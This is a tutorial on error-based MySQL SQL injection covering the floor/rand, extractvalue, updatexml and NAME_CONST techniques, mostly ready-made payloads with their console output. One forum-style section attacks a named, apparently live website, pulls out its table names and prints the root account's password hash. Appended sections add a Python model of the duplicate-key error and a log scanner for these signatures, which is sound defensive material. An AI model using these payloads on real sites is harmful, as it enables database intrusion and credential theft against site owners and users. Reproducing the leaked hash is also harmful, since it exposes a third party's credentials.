1. Error-based injection via floor()

The following payloads trigger the error:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() in the payload with the desired subquery. For example, to read the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
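The duplicate-entry error in section 1 is not a property of the data: MySQL evaluates the GROUP BY key once to look it up in its temporary table and, when the key is new, evaluates it a second time while inserting the row. Because rand(0) is seeded, floor(rand(0)*2) yields a fixed bit sequence, so the lookup and the insert can disagree. The Python model below is an added example, not code from the original post; the bit sequence is the commonly published start of floor(rand(0)*2) on MySQL 5.x and is treated here as a constructed input.

```python
# Added example (not from the original post): models why
# "select count(*), concat(<value>, floor(rand(0)*2)) x ... group by x"
# raises ERROR 1062 on MySQL 5.x.
from typing import List, Optional

# First values of floor(rand(0)*2) on MySQL 5.x as published in writeups;
# treated here as a constructed input to the model.
RAND0_BITS = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1]


class DuplicateEntry(Exception):
    """Analogue of MySQL ERROR 1062 (23000)."""


def simulate_group_by(prefix: str, bits: List[int], rows: int) -> dict:
    """Model the temporary-table GROUP BY with a non-deterministic key.

    prefix: constant part of the key (version(), a leaked column value, ...)
    bits:   successive values of floor(rand(0)*2), one consumed per evaluation
    rows:   number of rows in the table being grouped
    Returns per-key counts on success, raises DuplicateEntry otherwise.
    """
    rand = iter(bits)
    counts: dict = {}
    for _ in range(rows):
        key = prefix + str(next(rand))   # 1st evaluation: look the key up
        if key in counts:
            counts[key] += 1             # existing group: no re-evaluation
            continue
        key = prefix + str(next(rand))   # 2nd evaluation: key actually inserted
        if key in counts:                # lookup said "new", insert finds it present
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        counts[key] = 1
    return counts


def group_by_error(prefix: str, bits: List[int], rows: int) -> Optional[str]:
    """Return the error text the query would produce, or None if it succeeds."""
    try:
        simulate_group_by(prefix, bits, rows)
        return None
    except DuplicateEntry as exc:
        return str(exc)


if __name__ == "__main__":
    # Rows 1-3 consume bits 0,1 | 1 | 0,1: the third row collides, which is why
    # the payload needs a table with at least three rows. A constant key never does.
    print(group_by_error("5.1.33-community-log", RAND0_BITS, rows=3))
    print(group_by_error("5.1.33-community-log", RAND0_BITS, rows=2))  # None
    print(group_by_error("5.1.33-community-log", [1] * 20, rows=10))  # None
```

The same model explains why the payload must group a table with at least three rows and why a deterministic key never raises.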
Further collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection tricks for newer MySQL versions: injection via NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
| 1    |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
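All four techniques on this page leave a recognisable function call in the request, which makes them easy to flag in web-server access logs. The scanner below is an added example (not from the original post or the site it mentions): it URL-decodes the request path, normalises whitespace, and matches the floor()/rand() GROUP BY, extractvalue(), updatexml() and name_const() signatures against constructed sample log lines; the IPs, timestamps and status codes are made up.

```python
# Added example (not from the original post): flags requests carrying the
# error-based MySQL injection signatures discussed on this page.
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# One pattern per technique; applied after URL decoding so "+" and %xx encoding
# of spaces and parentheses do not hide the function call.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}
# Common/combined log format: client, two user fields, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic); the paths echo payload shapes from this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /qcwh/content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 480',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /qcwh/content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 490',
]


def classify_request(url: str) -> List[str]:
    """Return the names of the techniques whose signature appears in the URL."""
    decoded = unquote_plus(unquote_plus(url))        # twice: catches double encoding
    decoded = re.sub(r"\s+", " ", decoded)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, status, techniques) for every suspicious request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # not a request line we parse
        techniques = classify_request(m.group("url"))
        if techniques:
            hits.append((m.group("ip"), m.group("status"), techniques))
    return hits


if __name__ == "__main__":
    for ip, status, techniques in scan_log(SAMPLE_LOG):
        print(ip, status, ",".join(techniques))
```

Pairing a signature hit with a 500 status or a visible MySQL error string in the response body is a strong indicator that the injection actually reached the database.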